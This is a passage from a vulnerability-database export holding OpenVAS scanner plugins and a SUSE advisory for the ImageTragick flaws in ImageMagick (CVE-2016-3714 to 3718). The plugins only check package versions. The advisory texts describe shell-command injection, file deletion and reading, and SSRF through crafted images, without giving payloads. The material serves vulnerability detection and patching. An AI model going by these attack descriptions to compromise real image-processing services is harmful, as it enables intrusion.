rpm:\"perl-PerlMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-32bit\", rpm:\"libMagick++-6_Q16-3-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-3-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-32bit\", rpm:\"libMagickWand-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the 'ImageMagick' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310871609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871609", "type": "openvas", 
"title": "RedHat Update for ImageMagick RHSA-2016:0726-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ImageMagick RHSA-2016:0726-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871609\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:19:03 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ImageMagick RHSA-2016:0726-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ImageMagick is an image display and\nmanipulation tool for the X Window System that can read and write multiple\nimage formats.\n\nSecurity Fix(es):\n\n * It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the ImageMagick\nutilities, would lead to arbitrary execution of shell commands with the\nprivileges of the user running the application. (CVE-2016-3714)\n\n * It was discovered that certain ImageMagick coders and pseudo-protocols\ndid not properly prevent security sensitive operations when processing\nspecially crafted images. A remote attacker could create a specially\ncrafted image that, when processed by an application using ImageMagick or\nan unsuspecting user using the ImageMagick utilities, would allow the\nattacker to delete, move, or disclose the contents of arbitrary files.\n(CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n * A server-side request forgery flaw was discovered in the way ImageMagick\nprocessed certain images. A remote attacker could exploit this flaw to\nmislead an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities into, for example, performing HTTP(S) requests or\nopening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that\ndisables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL\ncoders. If you experience any problems after the update, it may be\nnecessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\");\n script_tag(name:\"affected\", value:\"ImageMagick on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0726-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-May/msg00010.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.2.7~4.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:26:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2016-05-05T00:00:00", "id": "OPENVAS:1361412562310807568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807568", "type": "openvas", "title": "ImageMagick Multiple Vulnerabilities May16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ImageMagick Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:imagemagick:imagemagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807568\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-05 14:06:00 +0530 (Thu, 05 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"ImageMagick Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ImageMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - Insufficient filtering for filename passed to delegate's command.\n\n - An error in ImageMagick's ephemeral pseudoprotocol.\n\n - An error in ImageMagick's msl pseudo protocol.\n\n - An error in ImageMagick's label pseudo protocol.\n\n - An SSRF vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, to delete arbitrary files, to move image\n files to file with any extension in any folder, to get content of the files\n from the server.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick versions before 6.9.3-10\n and 7.x 
before 7.0.1-1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ImageMagick version\n 6.9.3-10 or 7.0.1-1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/05/03/18\");\n script_xref(name:\"URL\", value:\"https://imagetragick.com\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_imagemagick_detect_win.nasl\");\n script_mandatory_keys(\"ImageMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!imVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:imVer, test_version:\"6.9.3.10\"))\n{\n fix = \"6.9.3.10\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:imVer, test_version:\"7.0.0\", test_version2:\"7.0.1.0\"))\n{\n fix = \"7.0.1.1\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:imVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. 
An\nattacker with control over the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if ImageMagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via the /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full removal of the PLT/Gnuplot\ndecoder, and the need for an explicit reference in the filename for the\ninsecure coders.", "modified": "2019-03-18T00:00:00", "published": "2016-05-16T00:00:00", "id": "OPENVAS:1361412562310703580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703580", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703580\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3580.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"imagemagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name:\"summary\", value:\"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. 
These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:57:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120688", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-699)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely 
excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120688\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:07 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-699)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in ImageMagick. 
Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update ImageMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-699.html\");\n script_cve_id(\"CVE-2016-3718\", \"CVE-2016-3717\", \"CVE-2016-3716\", \"CVE-2016-3715\", \"CVE-2016-3714\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", 
rpm:\"ImageMagick-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~13.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled. They can be re-enabled by exporting the\n following environment variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/modules-Q16/coders/vu\n lnerable/ (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "edition": 1, "modified": "2016-05-11T17:08:09", "published": "2016-05-11T17:08:09", "id": "SUSE-SU-2016:1275-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00032.html", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": 
